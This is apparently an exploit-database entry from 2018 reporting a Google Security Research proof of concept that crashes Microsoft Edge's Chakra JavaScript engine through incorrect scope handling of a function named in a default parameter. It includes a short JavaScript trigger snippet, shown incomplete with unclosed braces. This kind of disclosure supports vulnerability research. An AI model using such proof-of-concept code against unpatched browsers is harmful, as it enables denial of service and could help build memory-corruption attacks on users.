Microsoft Edge Chakra - Incorrect Scope Handling Exploit

ID 1337DAY-ID-29569
Type zdt
Reporter Google Security Research
Modified 2018-01-18T00:00:00


Exploit for Windows platform in category dos / poc

// PoC:
(function func(arg = function () {
    print(func);  // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
    function func() {
// Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.

# [2018-04-09]  #